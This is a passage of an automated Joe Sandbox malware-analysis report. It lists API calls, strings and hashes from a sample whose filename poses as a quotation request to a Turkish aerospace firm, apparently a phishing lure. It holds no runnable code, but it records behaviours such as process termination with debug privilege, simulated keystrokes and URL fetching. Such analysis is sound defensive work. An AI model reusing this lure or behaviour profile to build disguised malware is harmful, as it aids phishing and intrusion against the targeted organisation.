                                                                                                                                    • Opcode Fuzzy Hash: b3d803915e041b8af871d94a2788790acdba58401fda4be2ad408bf786f44f29
                                                                                                                                    • Instruction Fuzzy Hash: FC21AD3284021ABBCF15AF90CC0AEEE7739BF29704F084469F515660A2EB319B28DF11
                                                                                                                                    APIs
                                                                                                                                    • GetParent.USER32 ref: 001E20AB
                                                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 001E20C0
                                                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 001E214D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassMessageNameParentSend
                                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                    • API String ID: 1290815626-3381328864
                                                                                                                                    • Opcode ID: 44f08dd8cfd26b7c348baef8fe57e38d436752326862e12f9fb4c8f274cd68cd
                                                                                                                                    • Instruction ID: f23f88b3b002058e31e47364d47da768e142b56cd7f8576b6c11e77d9ffb19f1
                                                                                                                                    • Opcode Fuzzy Hash: 44f08dd8cfd26b7c348baef8fe57e38d436752326862e12f9fb4c8f274cd68cd
                                                                                                                                    • Instruction Fuzzy Hash: 95115C7E2C8B56BBF6092321EC1BDEE339CCB16728B200016F705A50E6FFB159115514
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1282221369-0
                                                                                                                                    • Opcode ID: 85a9fe05d4b1451f6086dab6f991827fd5c11d1064f44f90ab7d6529780c619b
                                                                                                                                    • Instruction ID: 2844749ea7667ed65a9076e278a7cc9eb60b62ed8278fe896437779527d0b06e
                                                                                                                                    • Opcode Fuzzy Hash: 85a9fe05d4b1451f6086dab6f991827fd5c11d1064f44f90ab7d6529780c619b
                                                                                                                                    • Instruction Fuzzy Hash: C9617571A04310AFDB25AFB4EC85AFA7BA6EF12720F0441ADF80497282EB319D0187D4
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00215186
                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 002151C7
                                                                                                                                    • ShowWindow.USER32(?,00000005,?,00000000), ref: 002151CD
                                                                                                                                    • SetFocus.USER32(?,?,00000005,?,00000000), ref: 002151D1
                                                                                                                                      • Part of subcall function 00216FBA: DeleteObject.GDI32(00000000), ref: 00216FE6
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0021520D
                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0021521A
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0021524D
                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00215287
                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00215296
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3210457359-0
                                                                                                                                    • Opcode ID: 9c7704ebada0cd550670fa1f17974524851bf42c5e194143a3f39dcc2f5db43b
                                                                                                                                    • Instruction ID: 34d69c5a0b84cf92bacf35d9d8cac20e2ee85d7acd9722000dc2b52b5dffe862
                                                                                                                                    • Opcode Fuzzy Hash: 9c7704ebada0cd550670fa1f17974524851bf42c5e194143a3f39dcc2f5db43b
                                                                                                                                    • Instruction Fuzzy Hash: CE51E735A70629FEEF259F24CC49BD837E5EBA5311F104081F918962E0C7B599E0DF40
                                                                                                                                    APIs
                                                                                                                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 001D6890
                                                                                                                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 001D68A9
                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001D68B9
                                                                                                                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 001D68D1
                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001D68F2
                                                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00198874,00000000,00000000,00000000,000000FF,00000000), ref: 001D6901
                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 001D691E
                                                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00198874,00000000,00000000,00000000,000000FF,00000000), ref: 001D692D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1268354404-0
                                                                                                                                    • Opcode ID: 63fb1eb863074ea34426b94719b3f44da22e94ca5a26934f5ca11fd81a199d75
                                                                                                                                    • Instruction ID: cbe5ef278110d5d1a582498e0cf15fa7749451b08f79fa56912833847a2301bd
                                                                                                                                    • Opcode Fuzzy Hash: 63fb1eb863074ea34426b94719b3f44da22e94ca5a26934f5ca11fd81a199d75
                                                                                                                                    • Instruction Fuzzy Hash: 89517774600309EFDF28CF24DC99FAA7BB6EB68754F244519F902972A0DB70E990DB50
                                                                                                                                    APIs
                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001FC182
                                                                                                                                    • GetLastError.KERNEL32 ref: 001FC195
                                                                                                                                    • SetEvent.KERNEL32(?), ref: 001FC1A9
                                                                                                                                      • Part of subcall function 001FC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001FC272
                                                                                                                                      • Part of subcall function 001FC253: GetLastError.KERNEL32 ref: 001FC322
                                                                                                                                      • Part of subcall function 001FC253: SetEvent.KERNEL32(?), ref: 001FC336
                                                                                                                                      • Part of subcall function 001FC253: InternetCloseHandle.WININET(00000000), ref: 001FC341
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 337547030-0
                                                                                                                                    • Opcode ID: a676cb5294a499668f5a3bb16e8c6414bd814afb64cf5cea70b4441639341291
                                                                                                                                    • Instruction ID: aa6a18c4cc0e3f7b47eed1862c3e35a5b52d07275691746dd0d7c670fce818e1
                                                                                                                                    • Opcode Fuzzy Hash: a676cb5294a499668f5a3bb16e8c6414bd814afb64cf5cea70b4441639341291
                                                                                                                                    • Instruction Fuzzy Hash: 5B31B67514060DEFDB219FA5DE48AB7BBF9FF64300B14841DFA5682611CB31D814EBA0
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 001E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 001E3A57
                                                                                                                                      • Part of subcall function 001E3A3D: GetCurrentThreadId.KERNEL32 ref: 001E3A5E
                                                                                                                                      • Part of subcall function 001E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001E25B3), ref: 001E3A65
                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 001E25BD
                                                                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 001E25DB
                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 001E25DF
                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 001E25E9
                                                                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 001E2601
                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 001E2605
                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 001E260F
                                                                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 001E2623
                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 001E2627
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2014098862-0
                                                                                                                                    • Opcode ID: d013e941c5a9e31bad5be151e49fb53cf6f41af611ab937c8c9b01850f8073d5
                                                                                                                                    • Instruction ID: f8aa6275eacc584f6e40f380201099dd3ed09473d6a73713c62ef6ac24ac5d22
                                                                                                                                    • Opcode Fuzzy Hash: d013e941c5a9e31bad5be151e49fb53cf6f41af611ab937c8c9b01850f8073d5
                                                                                                                                    • Instruction Fuzzy Hash: 7201B5302D0754BBFB1067699C8EF993E9DDBAEB11F204011F318AF0D1CEF114448A69
                                                                                                                                    APIs
                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,001E1449,?,?,00000000), ref: 001E180C
                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,001E1449,?,?,00000000), ref: 001E1813
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,001E1449,?,?,00000000), ref: 001E1828
                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,001E1449,?,?,00000000), ref: 001E1830
                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,001E1449,?,?,00000000), ref: 001E1833
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,001E1449,?,?,00000000), ref: 001E1843
                                                                                                                                    • GetCurrentProcess.KERNEL32(001E1449,00000000,?,001E1449,?,?,00000000), ref: 001E184B
                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,001E1449,?,?,00000000), ref: 001E184E
                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,001E1874,00000000,00000000,00000000), ref: 001E1868
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1957940570-0
                                                                                                                                    • Opcode ID: 7378dc7c7273ae20239cd9a96aea494c4af035c158b70e5c510520f4e4776610
                                                                                                                                    • Instruction ID: adf45ec4f5ab894cc36ba49139924f328cfd84845de5f219f471833310ad2d0b
                                                                                                                                    • Opcode Fuzzy Hash: 7378dc7c7273ae20239cd9a96aea494c4af035c158b70e5c510520f4e4776610
                                                                                                                                    • Instruction Fuzzy Hash: D901BFB92C0344BFE710AB65EC4DF9B7B6CEB99B11F108411FA05DB191CA709800CB60
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 001ED4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 001ED501
                                                                                                                                      • Part of subcall function 001ED4DC: Process32FirstW.KERNEL32(00000000,?), ref: 001ED50F
                                                                                                                                      • Part of subcall function 001ED4DC: CloseHandle.KERNEL32(00000000), ref: 001ED5DC
                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0020A16D
                                                                                                                                    • GetLastError.KERNEL32 ref: 0020A180
                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0020A1B3
                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0020A268
                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 0020A273
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0020A2C4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                                                    • Opcode ID: 2b49f4e70021ea55ea30ff69404460835d11c60a891fdc9f8d4fb1428063ca06
                                                                                                                                    • Instruction ID: a919dc0a2290aa882a8e9355b28c0b91b9a19f6f59dcc40475f6f72d3d374cb5
                                                                                                                                    • Opcode Fuzzy Hash: 2b49f4e70021ea55ea30ff69404460835d11c60a891fdc9f8d4fb1428063ca06
                                                                                                                                    • Instruction Fuzzy Hash: 1B618C34214342AFD710DF18D494F1ABBA1AF54318F54849CE86A8B7E3C772ED45CB92
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00213925
                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0021393A
                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00213954
                                                                                                                                    • _wcslen.LIBCMT ref: 00213999
                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 002139C6
                                                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 002139F4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window_wcslen
                                                                                                                                    • String ID: SysListView32
                                                                                                                                    • API String ID: 2147712094-78025650
                                                                                                                                    • Opcode ID: 0f983d70cb200a8275a16177a271d9b38ec9d27f74b835875e154509ccc29c0c
                                                                                                                                    • Instruction ID: afe5fbfbf395b2d42d53138e101763690cd77015c46092520b03fbb94936b295
                                                                                                                                    • Opcode Fuzzy Hash: 0f983d70cb200a8275a16177a271d9b38ec9d27f74b835875e154509ccc29c0c
                                                                                                                                    • Instruction Fuzzy Hash: AF41D631A10219ABEF21DF64CC49BEA77EAEF68350F100526F958E7281D7719DA0CB90
                                                                                                                                    APIs
                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001EBCFD
                                                                                                                                    • IsMenu.USER32(00000000), ref: 001EBD1D
                                                                                                                                    • CreatePopupMenu.USER32 ref: 001EBD53
                                                                                                                                    • GetMenuItemCount.USER32(01715488), ref: 001EBDA4
                                                                                                                                    • InsertMenuItemW.USER32(01715488,?,00000001,00000030), ref: 001EBDCC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                    • String ID: 0$2
                                                                                                                                    • API String ID: 93392585-3793063076
                                                                                                                                    • Opcode ID: 60699fee11ea3c370bbbfb2cdfe260e8349a5af7a9a906ceeb219b7339485248
                                                                                                                                    • Instruction ID: 677d2b2d9a20cef2973698123500bf9dd43f4944f4422824b2fca756a2b40cc0
                                                                                                                                    • Opcode Fuzzy Hash: 60699fee11ea3c370bbbfb2cdfe260e8349a5af7a9a906ceeb219b7339485248
                                                                                                                                    • Instruction Fuzzy Hash: 3151BF70A08A89ABDB14CFEADCC8BAFBBF5BF55318F248119E411A7290D7709941CB51
                                                                                                                                    APIs
                                                                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 001EC913
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconLoad
                                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                                    • API String ID: 2457776203-404129466
                                                                                                                                    • Opcode ID: 834e82fc625b1978aa438eaa9ee54258d48ffe2ac810c2394195209de29e3027
                                                                                                                                    • Instruction ID: 00bb67de1c42e42d36989d4d43284bf5d5e76e81854571c7b6b24c8976b95805
                                                                                                                                    • Opcode Fuzzy Hash: 834e82fc625b1978aa438eaa9ee54258d48ffe2ac810c2394195209de29e3027
                                                                                                                                    • Instruction Fuzzy Hash: C9113A36689B47BBE7089B15DC83CAE67DCDF27318B21002EF501A61C3E7B45E0252E9
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$LocalTime
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 952045576-0
                                                                                                                                    • Opcode ID: 17a277ea7ce265c67ed253a7c15f8295ac9ce2508a8861f93d07f888a748f52c
                                                                                                                                    • Instruction ID: 2178fcc4bb0f5c9bddbe59b66554663f1c6e4d196593f654489550a34d17c54b
                                                                                                                                    • Opcode Fuzzy Hash: 17a277ea7ce265c67ed253a7c15f8295ac9ce2508a8861f93d07f888a748f52c
                                                                                                                                    • Instruction Fuzzy Hash: FF41A069C10658B6CB11EBF4CC8AACFB7ACAF56310F548462F518E3121FB34E255C3A5
                                                                                                                                    APIs
                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,001D682C,00000004,00000000,00000000), ref: 0019F953
                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,001D682C,00000004,00000000,00000000), ref: 001DF3D1
                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,001D682C,00000004,00000000,00000000), ref: 001DF454
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ShowWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1268545403-0
                                                                                                                                    • Opcode ID: 976953ed494f99fa9bfd57438e24fd2d6e0a4a5048e4adcfc690c638e2df1960
                                                                                                                                    • Instruction ID: 0e5950ac001bfdef4fa4e216185635a458c69d06a32d2093bf95a45aa6449ce8
                                                                                                                                    • Opcode Fuzzy Hash: 976953ed494f99fa9bfd57438e24fd2d6e0a4a5048e4adcfc690c638e2df1960
